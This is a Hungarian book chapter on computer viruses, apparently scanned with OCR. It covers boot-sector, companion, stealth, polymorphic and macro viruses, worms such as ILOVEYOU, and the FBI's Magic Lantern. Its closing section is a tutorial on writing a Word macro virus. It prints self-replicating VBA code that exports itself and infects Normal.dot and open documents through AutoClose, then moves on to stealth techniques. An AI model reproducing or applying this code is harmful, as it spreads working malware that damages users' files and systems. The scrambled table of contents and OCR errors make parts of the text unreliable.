2 Companion vírusok 5.3 A vírus felépítése Hogyan fertőz meg a vírus egy fájlt? 5.2 Miről ismeri fel a vírusvizsgáló a vírust? 5.10 Update vírusok 5.4.Tartalom 5.5.dot fájl 5.4.4 Modul makrók 5. fejezet .3 Vírusok kontra ServiceRelease 5.2 5.az ILOVEYOU és társai 5.1.3 Killerprogramok 5.3 Videokártyák .5.5.1 Alapok 5.9 TSR fájlvírusok 5.5.5.1 Minden ténykedés központja .a Normal.3.2 A dropper vírust helyez el 5.5.1 Így fertőznek a bootszektor vírusok 5.4.6 Hálózati vírusok 5.5 Word makrovírus írása 5.4.4.4.5 Makrovírusok 5.az elvetemült támadók búvóhelyei? 5.4.4.4.4.1.1 Defektes cluster mint álcázás 5.5 Ilyet is lehet: a vírus egy Payload-ot hív meg .2 Modul vagy osztálymodul? 5.1 Bootszektor vírusok 5.7 Polimorf vírusok 5.4 A legfontosabb vírustípusok rövid áttekintése 5.4 Logikai bombák 5.8 Stealth vagy rejtőzködő vírusok 5.4.11 Férgek .12 Időzítők 5.3.1.4.

4 A vírusvédő program kiválasztásának a szempontjai .3 „Fertőtlenítő" 5.8.3 Hogyan tudott a féreg elterjedni? 5.6 5.5.5.7 Megfertőzött osztálymodulok ILOVEYOU 1385.142 A működési mód 5.1 Szkennermodul 5.1 Mi az a féreg? 5.5.8.2 Víruspajzs 5.6 A vírus fájltulajdonságokat vagy szövegtartalmakat változtat meg 5.8 Hogyan működnek a vírusvizsgálók? 5.8.4 A forrás .7.7.kommentárokkal 5.7 A vírus jelszóval védi a fájlt 5.8.7.7.

vagy ismert biztonsági réseken becsempészi magát a szerverszoftverbe. Ha a fertőzött számítógépeken elindítanak egy kódolóprogramot. hogy kódolás közben kvázi kukucskál a felhasználó válla fölött. A US-hatóságok szemében már régóta tüskét jelentettek az erős kódolásra alkalmas programok. és rögtön bizonyítékkal is szolgált.5 Vírusok .Veszélyes fájlok 5. Az amerikai szövetségi rendőrség. amely megteremti a dekódolás előfeltételeit.jelenti az MSNBC. Doktori disszertációjához fejlesztette ki az önmagát reprodukáló program elméletét. az USA fel adta a hivatalos ellenállást.com online média. Ezután a vírus mailben fogja elküldeni magát. az FBI egy eljárást fejleszt. a vírus minden billentyűzet-bevitelt feljegyez. úgy. hogy a kemény kódolóprogramok az exporttilalom ellenére is elterjedtek.1 Alapok Az FBI kódolás elleni vírust fejleszt Minden eszközzel a potenciális terroristák ellen . és elküldi az FBI-nak. Az általa . A Magic Lantern azelőtt kezd működni. 1983-ban programozta az első hivatalosan ismertté vált vírust Fred Cohan a dél-kaliforniai egyetemről. amellyel a kódolt adatokat már a keletkezésük helyén dekódolni lehet . Egy Magic Lantern nevű szoftver segítségével az FBI specialistái a jövőben egy olyan vírust tudnak becsempészni a gyanús szerverekre. Csak miután az ipar bizonyítékokat szerzett arról. mielőtt még az adatok kódolása megtörténne.. mivel az ezekkel kódolt adatokat nem lehet viszszafejteni. Az FBI-nak sok szerverrel nem lesz nehéz dolga..

vagy írjon ki egy meghatározott szöveget. Ebben a részben található a programkód is. Ennek ellenére óvatosnak kell lenni: ha hirtelen olyan hibák jelennek meg. 5. hogy a rendszer minden felhasználója megkapott minden elérési jogot. és a vírus arra használja. mintha egy képről. Egy vírustámadás következtében azonban bizonyos körülmények között minden adat és program elveszhet.a bootszektor vírusoknál . A valóságban jelentősen több kár éri a számítógépes rendszereket és az adataikat szabotázsoktól. Ha ez a hex-pattern már ismert. amelyek hasonló körülmények között eddig nem léptek fel. De ez a hely tartalmazhatná azt a parancsot is. fertőzött-e már egy fájl. amelyről a vírus felismeri önmagát. az kiderül a későbbiekben. Itt először egy szubrutinról van-e szó.1. Az esetleges álcázási eljárás szubrutinja is itt található. 5. Ezek azonban többnyire erőteljes túlzások. A második rész tartalmazza a tulajdonképpeni fertőzőrutint. hogy a vírus mondjuk x napon rajzoljon egy képet a monitorra. az adatokat csak tárolja. ami csak egy kis tréfát csinál.3 Videokártyák az elvetemült támadók búvóhelyei? A videokártyák gyakran állnak vírushordozó gyanújában.1.2 A vírus felépítése Minden vírus három vagy gyakrabban négy programrészből áll: az első rész egyfajta ismertetőjegy. vagy . amelynél a kórokozók átterjednek egyik egyedről a másikra. 5. CD-n vagy lemezen keresztül lehet kapni. és az elfoglalt clustert (helyfoglalási egységet) hibásnak mutatja. A program általában álcázva van. Ha talál ilyet. Mivel a komputervírusok a biológiai vírusokhoz hasonlóan viselkednek. A harmadik rész dönti el. Az újságokban és a televízióban újra és újra horrorisztikus híreket hallani új és veszélyes vírusokról. hogy ártalmatlan vírusról van-e szó. végrehajtható fájlt keres. vagy csak jelzik a hibát. hogy a vírus a program indításakor azonnal aktiválódni tudjon. A hatása az volt.4. például egy merevlemezre kerül. Persze nem vezethető vissza vírusra a számítógéppel történő munka során fellépő hibák mindegyike. fel lehet használni egy meghatározott vírus kereséséhez az adathordozón. akkor vírusellenőrzést kell végezni.programozott vírus Unix operációs rendszer alatt futott. itt is az átviteli folyamatot nevezik fertőzésnek. Ez hexadecimális karaktereknek egy 10-16 bájt hosszú láncából áll. amely közepes vagy nagy katasztrófát vált ki. A videokártya memóriáját a vírus legfeljebb egy azonosító tárolására használhatja. a szakszerűtlen kezeléstől vagy a hackertámadásoktól.1 Defektes cluster mint álcázás A vírusoknak többnyire álcázómechanizmusaik vannak. Gyakran éppen az ártalmatlannak vélt fájlok okozzák a legnagyobb károkat. Fertőzésnek az orvostudomány azt a folyamatot nevezi. a vírus bemásolja a programkódját a fájlba. vagy egy destruktív kártevőről. Az egyik ilyen mechanizmus például megakadályozza. Valójában ez lehetetlen: egy videokártya videomemóriája nem bootképes. A legtöbb felhasználói program (tehát a vírusvizsgálók is) egyszerűen átugorják a hibás clustereket. Ennek a segítségével tudja bármikor ellenőrizni. A legtöbb esetben a szoftver vagy egy meghajtó hiányosságáról van szó. amely szükség esetén úgy alakítja át a fájlt. hogy felismerje. mert egy EXE fájllal sok felhasználó már eleve óvatosan bánik. A keresés csak az önmagukat kódoló vírusoknál válik problematikussá.a lemez egy fertőzött bootrutinjával. A vírusok állítólag a kártya videomemóriájába fészkelik be magukat. . a hex-pattern. Ártalmatlan esetben itt található az utasítás. Ezért egyetlen vírus sem tud közvetlenül a videokártya memóriájából a számítógép végrehajtható memóriájába kerülni. egy Word vagy egy Excel fájlról lenne szó. A vírus befészkelődik az adathordozó egy tetszőleges helyére. hogy: „a következő újraindításnál formattáld a merevlemezt".2 Miről ismeri fel a vírusvizsgáló a vírust? Minden vírusnak van egy jellemző bitmintája. mint a vírusoktól és következményeiktől. Ez történhet egy olyan fertőzött program elindításával. ami jelentős anyagi károkat okoz. A vírus az egyik vírushordozóról egy másik potenciális vírushordozóra. hogy a felhasználó felfedezze a vírus elfoglalta tárterületet a merevlemezen. amely még nem fertőzött. Hogy az Offíce-alkalmazások makrovírusai milyen veszélyesek lehetnek. és a megmaradt tárterületet mutatják meg. 5. amelyet interneten. hogy meg van-e már fertőzve egy fájl. amelyek védik őket a lelepleződéstől.

mint a vendéglátója. az elejére pedig egy hivatkozást tesz erre a kódra.3. megint visszaugrik arra a helyre. Az eredeti címeket a vírus egy rendezett listára helyezi. Most már minden alkalommal. ahogyan a vírus beveszi magát egy programba. akkor ez először elindítja a vírust. Egy bootszektor vírus a következőképpen terjed.A negyedik résszel zárul a kör. és megfertőzze őket. Egyes vírusok azonban sokkal gátlástalanabbul viselkednek. amelyek a bootszektort és a fájlokat is meg tudják támadni. A vírus ezen a módon olyan lemezeken is terjedhet. akkor kompletten átírja a fájlt. a betöltőprogram csak egy jelzést küld a képernyőre: nem rendszerlemez. amennyi helyre szüksége van. Ez egy rutin. a merevlemezre vagy egy fájlba. és egyszerűen átírnak a fájlból annyit. ezért is lehet egyre nehezebben osztályozni a vírusokat. A víruskódnak ez a fájlhoz fűzése nem okoz maradandó károsodást a fertőzött fájlon. ahol a vírus megszakította a program futását. amellyel a program a víruskód végrehajtása után visszatér oda. 5. 5. Ha a programot elindítják. a vírusokat el lehet távolítani. Több módszer kombinációja is gyakran előfordul. és ezután áttereli a beolvasást az átültetetett eredeti bootszektorra. nem is vírussal fertőzött program. Ha a gazdaprogram. és minden programnál a vírusprogram címét adják meg. ám ha lefut. Ha ezt végrehajtotta.1 így fertőznek a bootszektor vírusok A vírusok egy másik típusa áthelyezi az eredeti bootszektort. először a vírus indul el.3 Hogyan fertőz meg a vírus egy fajit? A fájlok megfertőzésénél a legnagyobb különbségek a módban vannak. illetve DOS-bootszektort fertőzik meg a merevlemezen. ugyanolyan méretű vagy nagyobb.4. majd az továbbítja az elérést a helyes címre.2 A dropper vírust helyez el A dropper nem vírus. csak fájlokat.1 Bootszektor vírusok A leggyakrabban fellépő vírusok az olyan bootszektor vírusok. a helyére pedig a saját betöltőprogramját írja. A vírust az ilyen lemez is hordozhatja. a vírus pedig elrejtőzik valahol az adathordozón. Itt található az a parancs.4 A legfontosabb vírustípusok rövid áttekintése A vírusfigyelmeztetések szinte már a napi rutinhoz tartoznak az interneten. Az ilyen vírusok a hajlékonylemezek bootszektorát és/vagy a master boot recordot (MBR). Ha a gép indításkor a bootszektorhoz ér. amelyeknek a fájlmelléklete vírust rejt. Minden fertőzésmódnak létezik néhány variánsa. a vírusbetöltő először a vírust indítja el. akkor ez viszonylag észrevétlenül történhet. Emellett vannak még hibrid vírusok is. egy vírust telepít a memóriába. 5. 5. Ha egy programot elindítanak. mert a „fertőzésveszély" a típustól függően nagyobb vagy kisebb. Egyes antivírus-programok megkísérlik a dropperek felismerését. Ha a bootolási kísérletnél nem talál operációs rendszert. A droppereket egy bizonyos vírus átvitelére alkalmas programként vagy egyszerűen egy szabotázs segédeszközeként írják meg. Az alábbiakban egy rövid áttekintést adunk a legfontosabb vírustípusokról és sajátságaikról. hogy milyen vírusról van szó.3. Felhasználóként legfeljebb a fertőzött program indulási sebességének a minimális változását vesszük észre. Ha a vírus nagyobb. a fájl. mint a vírus. s az újabbaknak ez általában sikerül is. amelyek nem tartalmaznak programokat. amennyire a programkódjukhoz szükség van. Sok vírus egy futtatható fájl végéhez fűzi a saját programkódját. hogy azokhoz is hozzáférkőzzön. a DOS boot recordot. . mikor a programot elindítják. ahol eredetileg megszakította a folyamatot. amely utasítja a BlOS-t az operációs rendszer betöltésére. mivel a nem bootképes lemezeknek is van egy minimális bootszektoruk. Többnyire a mailektől óvnak. 5. Ez fontos. és annyival meghosszabbítja. Más vírusok átírják a FAT-ben található könyvtárinformációt. illetve a master boot partíciós szektort vagy a DBR-t. az a saját feladatainak a futtatása előtt először a vírusprogramra ugrik. és ettől a perctől kezdve még meg nem fertőzött fájlokat keres. Az ilyen figyelmeztetésekben általában azt is megadják. mint a Form és a Stoned vírus.

a vírus azonban nem tudja a gépbe helyezett lemezekre másolni magát. mikor a bootszektor vírus telepíti magát.2 Companion vírusok Ha egy COM és egy EXE fájlnak ugyanaz a neve. minden a legnagyobb rendben működik. a valóságban a vírus ír a lemezre) megvizsgálja a lemezt. és a BIOS-ban Boot from Floppy van beállítva: tehát a számítógép megpróbál erről a lemezről elindulni. installálja a Stoned vírust a bootszektorába. A különböző bootszektor vírusok működési módjai a részleteikben ugyan különböznek egymástól. Ha a vírus befejezte a ténykedését. Semmi jelentősége nincs annak. A boot-támadás idején azonban tehetetlenek. csak a lemezek vizsgálatakor tudják felismerni és törölni a bootszektor vírusokat. mikor megtudják. és ezt a nevet begépeljük. hogy a számítógépe és ezáltal a lemez is bootszektor vírussal fertőzött. akitől a lemezt kaptuk. amit tartalmaz. tehát a vírus fut le. ennek ellenére gondosan ellenőrizzük vírusvizsgálóval. A következő reggelen újból bekapcsoljuk a számítógépet. Sokan meg vannak lepve. Mivel azonban fogja a flopiról olvasás/flopíra írás interruptját. működési módjuk miatt. vagy hogy milyen vírusvédő programot telepítettek rá. és csak így lehet őket továbbadni (egy bootszektor-vírus nem tud például a hálózaton keresztül terjedni). vagy hogy kiírja: Nem rendszerlemez. például készített egy újabb companion vírust egy újabb fájlhoz. második lehetőségként pedig meg lehet adni a CD-ROM meghajtót. Ezeket az intéző alapértelmezésben nem mutatja. az EXE fájlhoz készítenek egy azonos nevű COM fájlt. olvasásról van szó. mert abban a pillanatban. kicseréli magára az MBR-t. hogy lefuttassa a kódot. 5. Egyes operációs rendszereknél. Ha ezután megpróbáljuk elindítani az EXE fájlt. A companion vírusok is ezt a körülményt használják ki. nehogy másoknak okozzanak károkat továbbadáskor. a vírusprogram minden A: meghajtóra/-ról irányuló írási vagy olvasási műveletnél (habár azt gondoljuk. és így a megváltoztatott programok némelyike egyáltalán nem is veszi észre. Telepíti magát a merevlemezre. mint azt egy döbbent Unix-felhasználó megtapasztalta. hogy először mindig a merevlemezről próbáljon bootolni. helyette a COM program. a BIOS-t még mindig át lehet állítani egy tiszta(!) lemezről bootolásra. és az eredeti MBR-t a merevlemez egy más pontján helyezi el. amelyek nem DOS-alapúak.4. és így nem tud terjedni. az operációs rendszer vagy a védőprogram még egyáltalán nincsen betöltve. Volt néhány igazán sikeres companion vírus. Betölti a lemez első szektorát a memóriába. lefut az MBR. A vírus erre a célra egy fertőzésszámlálót tartalmaz. Ajánlott a számítógép fő bootszekvenciáját úgy beállítani a BIOS-ban. mikor 2000. A vírusprogramozónak az a fő előnye. A lemezt behelyezzük az A: meghajtóba. amely egy rögzített értéktől kezdve visszaszámol. és innentől kezdve az indítási folyamat a megszokott módon folytatódik. A fertőzött flopik bootszektoráról kerülnek fel a gépre. Kárt azonban ugyanúgy okozhat ezeken a gépeken is. a PC ugyan megfertőződík. A lemezeket. még ha ez a kísérlet sikertelen is lenne. és lenyomunk valamilyen billentyűt. A vírus memóriarezidenssé válik. és ezután betölti az eredeti MBR-t. mint a Stoned vírus. Eddig a vírus még semmit sem csinált.Kapunk egy flopit adatokkal. rátelepszik a 13h interruptra. az adathordozóról történő olvasás és írás interruptjára. Az elrejtéshez gyakran a rejtett vagy a rendszer tulajdonságot adják a fájlnak. amelyeket kapunk. és a vírus programja lefut. elindítja az EXE programot is. hogy egy vírus ilyen módon terjed. hogy milyen operációs rendszert használ a gép. A fertőzés csak a fertőzött lemezről történő indítási kísérletnél következhet be. de nem sok. Valamikor kikapcsoljuk a számítógépet. hogy az EXE fájl egyáltalán nem változik. Ezt az üzenetet már ezerszer láttuk. a folytatáshoz üssünk le egy tetszőleges billentyűt amennyiben nem talál rajta DOS-rendszerfájlokat. Ha ezután elindul a gép a merevlemezről. A vírusvizsgálók. amelyek a vírussal fertőzöttek. de az alapelv mindegyiknél ugyanaz. és elkezdjük használni az adatait. azonban nem tudja. a DOS először mindig a COM fajit hajtja végre. ami bekerül az A: meghajtójába. Az. és ebben keresendő a bootszektor vírusok gyakoriságának az oka is. 5. előbb vagy utóbb pedig tovább adjuk ezeknek a lemezeknek valamelyikét. és ezzel a körforgás elölről kezdődik. A bootszektor vírusok PC-ket támadnak meg. amelyben benne van a víruskód. A lemez még az A: meghajtóban van. így a gépünk most minden lemezt megfertőz. tehát kioldjuk a meghajtózárat. amelyek bizonyos számú fertőzés után tönkreteszik a fertőzött gép merevlemezét.4. Ha egy merevlemez-problémánál a bootolás lehetetlenné válna (headcrash vagy hasonló). Ha eléri . ami mostanra azonban már nem más. Ez a flopi azonban Stoned vírussal fertőzött. és ha még nincs megfertőzve. március 6-án a Michelangelo vírus meglepetésszerűen lecsapott a gépére. hogy egy vírus terjed.3 Killerprogramok A killerprogramok olyan vírusok. hogy úgy tűnjön.

„A" kolléga megfertőzi a számítógépét.6 Hálózati vírusok Speciális hálózati vírusokból még kevés van. és minden rendszer más programozási követelményeket állít. A vírus „B" kolléga gépén is memóriarezidens lesz. hogy egy vírus. Ezek a vírusok nem programfüggelékként terjednek a rendszerekben. minden kezdődik elölről. Az ILOVEYOU a maga idejében pontosan ilyen vírus volt. „A" kolléga néhány programot a hálózaton futtat. Másképp történik a fertőzés az olyan vírusoknál. Ha ezután egy dokumentumot mentünk vagy nyitunk. „B" kolléga több más programot futtat saját. A vírusnak tehát nem kell a szokásostól eltérően viselkednie ahhoz. és végrehajt egy fertőzött fájlt.. A klasszikus hálóvírusok az úgynevezett férgek. barátokhoz stb.5 Makrovírusok A makrovírusok olyan vírusok. „B" kolléga bejelentkezik a szerverre. Mivel ezek minden rendszerben mások. A legtöbben azt hiszik. a felhasznált programnyelv alapján adatokat tudnak törölni vagy módosítani. 2. és futtatják a ferőzött fájlokat.4 Logikai bombák A logikai bombák a vírusok különleges fajtái: ezeknek a működésbe lépését kiválthatja egyfajta időzítő vagy egy feltétel teljesülése. 6. ezek is megfertőződnek.4. Ilyenkor minden fájl ott marad ugyan a merevlemezen.dot fájlt. hálózatra csatlakozó számítógép fertőzött.. az is megfertőződik a vírussal.. Egyes esetekben a vírus ilyenkor kiadja és lefuttatja a FORMÁT C: parancsot. Először is a bootszektor vírusok nem tudnak hálózaton keresztül terjedni. Más vírusok minden fájlt törölnek az adathordozón. Amint megnyitunk egy fertőzött Word dokumentumot. még nincsenek. helyi merevlemezén és a szerveren. hogy fájlok olvasása és írása ugyanolyan módon történik a szerveren.a nullát. mindig egy rendszer gyenge pontjaira vannak kihegyezve. Itt elég. belátható időn belül aligha lesznek olyan vírusok. ha több. 4. 3. mint lokálisan. még akkor sem. mert ez a vírustípus csak flopin keresztül terjed. 5. A hálózat egy DOS-eszközt emulál.doc vagy . Még kompu- . Ezek a vírusok többnyire egy meghatározott rendszerre korlátozódnak: a bombák rendszerint csak egy megadott környezeten belül tudják reprodukálni magukat. 5. . amelyek például Mac és MS-DOS gépeken is tudnának működni. például egy bizonyos szó vagy felhasználói név beírása vagy hiánya. az megfertőzi a Normal. „C". 5. ez azt jelenti. ha „A" kolléga lefuttatja a fájlt. „D" és „E" kollégák bejelentkeznek. amelyek ezáltal ugyancsak megfertőződnek.4. Valamennyi végrehajtott fájl megfertőződik. valószínűleg egy e-mail mellékletével vagy egy barátja demólemezével. milyen parancsokat tudnak kiváltani. kiváltja a rombolóakciót. 7. 5. Makrovírusokat jellemzően Microsoft Word dokumentumokban (. azonnal viharos sebességgel el is terjed rajta. A vírusok. hanem önállóan tudják reprodukálni a saját kódjukat. A makrovírusok például egy másikra tudják cserélni a Mentés parancsot. hogy a szerveren is meg tudjon fertőzni fájlokat. Ez azonban a valóságban sokkal bonyolultabb. és így lavinát vált ki.dot végződéssel) és már Excel fájlokban is találunk.4. és milyen trükköket vetnek be álcázásként. amelyek elküldik magukat a mail-címjegyzék minden címére. amelyek több operációs rendszerben is tudnának terjedni. A különböző címjegyzék-bejegyzéseken keresztül a vírus gyorsan eljut az üzletfelekhez. A vírus memóriarezidenssé válik. és a címjegyzékéből minden kollégája kap egy mailt a vírussal. Olyan vírusok. azonban a legtöbb vírus hálózaton is tud terjedni. Hogy a makrovírusok hogyan működnek. a koncepciójuknál fogva. az a későbbiekben fog kiderülni. és önálló programként tudják lefuttatni magukat. csak az adatállomány többé nem olvasható és használható. A fájlvírusok ezzel szemben a következőképpen fertőznek hálózaton keresztül: 1. amint bekerül egy hálózatba. és ezért ezen a környezeten kívül hatástalanok.és így tovább. A legbarátságtalanabb változat a FAT bejegyzéseit változtatja meg. amelyek adatfájlokat fertőznek meg. Ha ezek a kollégák ugyancsak megnyitják a mellékletet. Más sajátosságai mellett saját magát szaporította. „A" kolléga további programokat futtat a merevlemezén.

A vírus memóriarezidenssé válik. Használnak még más fertőzőrutinokat is. Egyes vírusok overlay fájlokat (programok lapozófájljai) fertőznek meg.) Az első gyorsan fertőző vírus a Dark Avenger volt. a DIR parancs). amely ellenőrzi. az ilyen típusú vírus fájlokat támad meg. akkor legalább egy interruptot fogni tud. Ahhoz.4. ahová eltettem. és minden további futtatás ismét elindította a küldést. hanem azzal rokon zavaróprogramokról. A vírusprogramozó ezt a programot szeretné a legjobban becsapni. amelyből egy helyen nem fordul elő két másolat. 5. a vírus azt mondja magában: „Aha. amely a fájlt olvassa. Ezért egy ilyen vírust nem lehet egyszerűen egy meghatározott bájtsorozatról felismerni. De ez még nem minden: a rutin azt is megvizsgálja. amely a víruskódok egy bizonyos repertoárja után kutat. mert a mailforgalom egyfolytában növekedett. amelyik ezzel a trükkel dolgozott. ami pedig a komputeres világban megjelenő vírusok 99%-ára igaz. bár ez az esetek 99%-ára igaz. 5. akkor az a 13h interruptot használja (az adathordozók olvasása/írása). és általában minden utána elindított programot megvizsgál.4.10 Update vírusok Az update vírusok különösen ravasz kórokozók. valakinek le kell futtatni a fertőzött programot. és hálózati funkciók segítségével más számítógépekre másolódnak. amit a meghajtó tartalmaz. A stealth vírusoknál viszont.9 TSR fájlvírusok A második leggyakoribb vírusfajta a TSR fájlvírus. Ha újabb verzió van telepítve. A hex pattern mellett ezek a vírusok nemcsak egy verziószámot tartalmaznak. akkor lecseréli ezeket. csak azokat a bájtokat látja. Mint a neve is mutatja. Ha igen." Ezáltal a lekérdező programnak semmi szokatlan sem tűnik fel. azonban van néhány eszközmeghajtó vírus is. A polimorf vírus olyan kártevő.11 Férgek . azok közül is általában a COM és az EXE .8 Stealth vagy rejtőzködő vírusok Ha egy vírus memóriarezidenssé tud válni. ennél sokkal összetettebb és nehezebb feladatot kell megoldania annak. ha csak megnyitjuk azt (például egy adatmentésnél bizonyos körülmények között minden fájlt megnyitnak. itt valaki látni akarja a bootszektort. Családokra oszlanak. és aztán a fertőzött bootszektor helyett az eredeti tartalmát prezentálom.4. amelyek ugyanazt a bájtsorozatot tartalmaznák. és a végrehajtható programoknak sem feltétlenül kell COM vagy EXE kitérjesztésűeknek lenniük. mert egy bootszektor vírushoz sokkal egyszerűbb álcázórutint írni. amelyek önállóan tudnak egy hálózaton terjedni. 5. ha egy tetszőleges program megpróbálja olvasni a bootszektort. mint amilyen a Frodo. hogy egy TSR vírus terjedni tudjon. 5. Hi-hi. A komputerférgek saját magukat tudják reprodukálni. A Green Caterpiller fertőzőrutinját viszont minden olyan folyamat kiváltja. hogy a vírus fellépett-e már valamely verziójában. akkor ezzel nem fertőz újra.tercégeknél is egész részlegeket bénított meg. Többnyire több. Ezeknél nem klasszikus vírusról van szó. hogy gazdaprogramokhoz fűzzék magukat. hasonló trükkel szintén el tudják titkolni a létezésüket úgy.OVL fájlok. amelyek azonban vírust is tartalmazhatnak. aki el akarja csípni. Az ilyen álcázási képességek azonban gyakrabban figyelhetők meg bootszektor vírusoknál. A fájlvírusok. amelyeknek nincs szükségük arra. amelyeket az a vírusfertőzés előtt tartalmazott. Egyes vírusokat gyorsan fertőző vírusoknak is neveznek. és ezeket többnyire egyetlen programozó vagy egy csoport fejleszti. ha az még nem fertőzött.4. egymáshoz kapcsolódó programszegmensből állnak. 5. A férgek önálló programok. hogy milyen fájlok állnak rendelkezésre az adathordozón (pl. de a legtöbb esetben egy program csak akkor fertőződik meg. amikor végrehajtják.az ILOVEYOU és társai A komputerférgek olyan programok. amely meghatározza. hogy minden program. Az ilyen vírusok már akkor megfertőznek egy fájlt. hanem egy update rutint is. Ha bootszektor vírusról van szó. mint fájlvírusoknál. Egyszerűen beolvasom az eredeti bootszektort onnan. hogy a fájlok tartalmazzák-e már a vírus egy régebbi verzióját. fájlokat.4.7 Polimorf vírusok Az antivírus programok leggyakrabban használt fajtája a szkenner. Az 1986-ban készült Éráin vírus volt az első olyan. hogy megfertőzze. ezek az *.

de biztosan nem volt a tudatában annak. A UserFormok a makroprogramozás szempontjából nem érdekesek. 5. Ezt a fájlt támadják meg. kiváltja a vírus akciótartalmának a végrehajtását.ActiveVBProject.VBComponents. amely a WordBasicben elérhetetlenné teszi a MacroCopy és Application OrganizerCopy parancsokat. amelyek azután minden dokumentumra érvényesek.Count . hogy a makrók engedélyezésére kattintott. hogy az egészet csak tájékoztatásnak szánjuk.2 Modul vagy osztálymodul? A vírusok mindig egy osztálymodulban vagy egy modulban vannak. ha valakitől egy olyan dokumentumot kapott. VBE. és a Normal.4. A VBA lassú.1 Minden ténykedés központja . A feltétel lehet a bekapcsolástól számított időtartam vagy egy előre meghatározott dátum. akkor ezek a fájl megnyitásakor rendszerint ugyancsak megnyílnak és aktívvá válnak. a vírusspecialista Aciidfreak útmutatója. Attribute VB_Name = "demo" On Error Resume Next Application. Az időzítők feltételeinek a választéka szinte határtalan. amelynek a sablonjában makrók voltak. amelyeket bárhol újra elő lehet venni.dot-ot.5.a Normal. A naptári dátumok mellett olyan rutint is lehet használni. Lehet. A következő oldalakon sok minden kiderül a Word makrovírusok programozásáról. a Normal.5. Először a modulokban lévő makrovírusokkal foglalkozunk. még nem fertőzött DOCfájlba. hogy Modulról vagy Osztálymodulról. amely a szóban forgó napon automatikusan elindul. Itt a Beszúrás menüből kiválasztjuk. Minden parancsnak a birtokában van. Aki tud VB-ben programozni. 5. A vírusprogramon belül egy rutin lekérdezi a rendszeridőt.5. már megérte az ismertetés. hogy milyen trükkökkel álcázhatják a programozók a programjaikat. Ez a kérdés azonban csak erre a dokumentumra érvényes.dot-ból minden. nem pedig megvalósítás céljára. VBComponents(" demo").12 Időzítők Az időzítők a vírusok speciális kioldómechanizmusai. Ez a makrovírus alapÖtlete.dot-ba másolni a makrovínisokat.5 Word makrovírus írása Biztos.dot fájl A Word minden indításkor betölt egy globális fájlt. a modulok és az osztálymodulok a fontosak. és minden API-funkciót is ismer (API = Application Programming Interface). Ha az elér egy rögzített értéket.Export "c:\demo.3 Vírusok kontra ServiceRelease Az SR-1 a Microsoft egy ServiceRelease-e. 5. Ebben a fájlban lehetnek a makrók. és milyen potenciális veszélyeket hordoznak ezek.5. Egy modul elkészítéséhez az Eszközök/Makró/Visual Basic-kel megnyitjuk a Word makroszerkesztőjét. Elméletileg így például születésnapi üdvözletet lehet valakinek küldeni. vagy kétkedőn a tiltásukat választotta. Sub AutoCloseQ For I = 1 To NormalTemplate. hogy mindenki látta már a Word megerősítő kérdését. hogy a Wordot megfertőzzék. Ha a Word fájlok makrót tartalmaznak. de hatalmas. ugyanabban az órában indul el. Itt különösen fontos tudni.5. de hangsúlyozzuk. 5. hogy aktiválja-e a makrókat is. amit a VB alatt is használni tudunk. Ezekbe kerülnek az önálló projektrészek. valamennyire módosított formában.VBProject.sys" 5. Íme. De a Word idegen szövegeknél megkérdezi. esetleg UserFormról lesz-e szó. amire egy Word makrovírushoz szükség van. amely minden nap. hogy milyen veszély bújik meg mögöttük. ezért kell a fertőzéshez a Normal. de egy vírusíró erre mindig talál megoldást.4 Modul makrók Az alábbiakban megtalálható minden. annak nagyon egyszerű a makrók írása. Ha ezzel valaki meg tud úszni egy Word makrovírust vagy legalább felismeri azt.

dot-ban és nem az aktív dokumentumban vagyunk. VBProject Dobj.sys" A modult a C\demo.Import ("c:\demo.VBProject.stealth A Word alapértelmezésben megmutat egy modult a VB Editorban. Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument. VBProject_ Else If ActivInstall = False And Normlnstall = True Then Set Dobj = ActiveDocument.sys") Itt importálja az elején exportált fájlt (a vírust). hogy később lehetőleg egy fertőzendő fájlba lehessen importálni. amelyek automatikusan végrehajtódnak: például AutoOpen. VBProject. VBProject-re állítja. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót.If NormalTemplate. Autoexec. hogy mire lett állítva a Dobj.Name = "demo " Then Normlnstall = True Ha a Normal. For I = 1 To NormalTemplate. IfActiveDoaiment. amelyeket be lehet építeni. És a modul neve általában a vírus neve.VBComponents. hogy később kiváltsa az aktív dokumentumba importálást. hogy később melyik fájlba importál: vagy a Normal. VBComponents. VBComponents. amit demo-nak hívnak (tehát a vírus). Annyiszor ismétli az utána következő kódot.dot-on keresztül célzottan másolni is lehet a makrókat. vagy az aktív dokumentumba. Annyiszor ismétli meg a For és a Next közötti kódot. Application.sys fájlba exportálja. VBComponents.Count If ActiveDocument.Name = "demo" Then ActivInstall = True Next I If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate. VBProject.ActiveVBProject.VBCpmponents(I). ha egy dokumentumot bezárnak. Vannak még más autofunkciók is. If ActivInstall = True And Normlnstall = False Then Set Dobj = NormalTemplate. akkor a Dobj NormalTemplate. Az álcázáshoz . VBComponents(I). VBProject Ha az aktív dokumentumban. Az álcázás .VBProject. On Error Resume Next Ez esetleg a VB-ből már ismert. VBProject Itt a feltétel fordítva is átfut: Ha a Normal.sys") End Sub így ni. mint a vírusé). ahány modul van a Normal. Dobj. Hogy melyik fájlba lesz csomagolva.dot-ban vagyunk. Count Ez egy For ciklus. akkor a Dobj-t NormalTemplate. ezt most fogjuk most darabokra szedni.dot-ba. ahelyett.VBProject. Sub AutocloseQ Ez a sub minden alkalommal lefut. If NormalTemplate.VBComponents. VBE. és nem a Normal. egyszerűen a következő parancsot hajtatja végre.VBComponents(I).Name NormInstall = True Next I = "demo" Then For I = l To ActiveDoctiment.Export "c: \demo. VBComponents ("demo").dot-ban van egy modul. az attól függ.VBProject. True-ra állítja az Activlnstall-t. Attribute VB_Name = "demo" A Demo a modul neve. Itt rögzíti.Import ("c: \demo.Count Ez egy For ciklus. ami elárulná a vírust.dot-ban. hogy hibaüzenetet írna ki. VBCpmponents(I). Most néhány funkció következik. Ha hiba lépne fel. ezenkívül a Normal. VBProject. True-ra állítja a NormalInstall-t. Next I A For cikluson belül a következő értékre lépteti a ciklusváltozót. Ebben a fájlban benne van az egész forráskód. VBProject-re lesz állítva.Name = "demo" Then ActivInstall = True Ha az aktív dokumentumban van egy modul. ahány modul található az aktív dokumentumban. AutoExit. For I = 1 To ActiveDocument. amelynek a neve „demo" (tehát.

